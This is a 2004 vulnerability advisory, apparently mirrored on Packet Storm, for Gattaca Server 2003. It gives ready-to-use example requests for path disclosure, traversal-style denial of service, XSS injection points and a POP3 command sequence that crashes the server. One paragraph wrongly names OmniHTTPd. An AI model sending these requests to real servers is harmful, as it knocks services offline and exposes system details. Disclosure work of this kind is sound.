what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Gattaca_Server_2003.txt

Gattaca_Server_2003.txt
Posted Jul 15, 2004
Authored by Dr. Insane | Site members.lycos.co.uk

Gattaca Server 2003 version 1.1.10.0 is susceptible to full path disclosure, cross site scripting, and multiple denial of service attacks.

tags | advisory, denial of service, xss
SHA-256 | a2081aacff40e09987d1fdd220f9e159cd210b6b03a5656b73841afd03dd340d

Gattaca_Server_2003.txt

Change Mirror Download
                                     

www.r34ct.tk

Security Advisory


Advisory Name: Gattaca Server 2003 (1.1.10.0)
Release Date: 07/15/2004
Application: Gattaca Server 2003 (1.1.10.0)
Platform: Windows XP/NT
Severity: Medium
Author: dr_insane (dr_insane@pathfinder.gr)


Description:
A high performance Windows NT based Mail and Web Server software for building own intranet. You may
register unlimited users, use unlimited domains. Supporting POP3, SMTP, and HTTP protocols. Integrated
with TMPL library, allow you write own CGI scripts.
Multiple vulnerabilities have been identified in Gattaca server 2003 that may allow a remote attacker
to compromise a remote system.


Details:

Issue #1: Installation path exposure

A malicious user can gain knowledge of the installation path by sending a null byte to the server.

example: http://[host]/%00

Output:
--------------------------------------------------------------------------------
(X)TMPL error
File [C:\Program Files\Gattaca Server\doc\webadmin\index.cgi] not found or invalid
Virtual Host at C:\Program Files\Gattaca Server\doc\webadmin\
--------------------------------------------------------------------------------


Issue #2: WWW-root path exposure

There is a second vulnerability that can be used to reveal the WWw root directory.Input passed to the "Language"
parameter in certain scripts isn't properly sanitised before being returned to the user.

example: http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]

Output:
(X)TMPL error
File /whatever/_head.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/web.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/_foot.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

Issue #3: Denial of Service attack

The third issue is a denial of service attack that can be used to to slow a remote system. The CPU usage
will hit 100% and the server will become unavailable.

Examples:
http://[host]/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en

issue #4: Cross site scripting injection

Another vulnerability has been found in Gattaca server , which can be exploited by malicous people to conduct XSS attacks.
This can be exploited by creating a malicious link including script code, which will be executed in a user's browser when
the link is clicked or a malicious web site is visited. Successful exploitation may result in disclosure of various
information (eg. cookie-based authentication information) associated with the site running OmniHTTPd or inclusion of
malicious content, which the user thinks is part of the real website.

examples:
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code]
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en


issue #5: Denial of service attack [2]
Gattacca Server fails to handle multiple open connections on ports 25/tcp and 110/tcp. By establishing about 600
connections on port 25 or port 110 the server will crash.


issue #6: Denial of service attack [3] - message handling

By connecting and authenticating on POP3 service a remote user can crash Gattaca service. There are multiple problems
in the way the servers handles the commands list, retr and uidl.

example:
C:\>telnet r34ct-krew 110
+OK GeeOS/1.1 POP3 Server ver 1.0, ready :-).<3824.50a943410378@pomonis>
user test
+OK User name accepted, password please :-|
pass w
+OK GeeOS mail box open ;-)
list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405

The commands above will crash the server. An error message will be generate:
"Unhandled exception in: geeosserv.exe (TMAIL.DLL):0x0000005: access violation.

-------------snip---------------
0037A382 or eax,eax
0037A384 je 0037A4C5
0037A38A mov edi,eax
0037A38C shl edi,4
0037A38F cmp dword ptr [ebp+edi-7624h],0FFh
0037A397 je 0037A46F
0037A39D mov edi,eax
0037A39F shl edi,4
0037A3A2 cmp byte ptr [ebp+edi-762Ch],0
0037A3AA je 0037A416
0037A3AC mov edi,eax
0037A3AE mov esi,edi
0037A3B0 shl esi,4
------------snip----------------

Workaround:
Use another product


Credit:
Dr_insane
Http://members.lycos.co.uk/r34ct/


Feedback
Please send your comments to: dr_insane@pathfinder.gr
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    8 Files
  • 6
    Jul 6th
    8 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close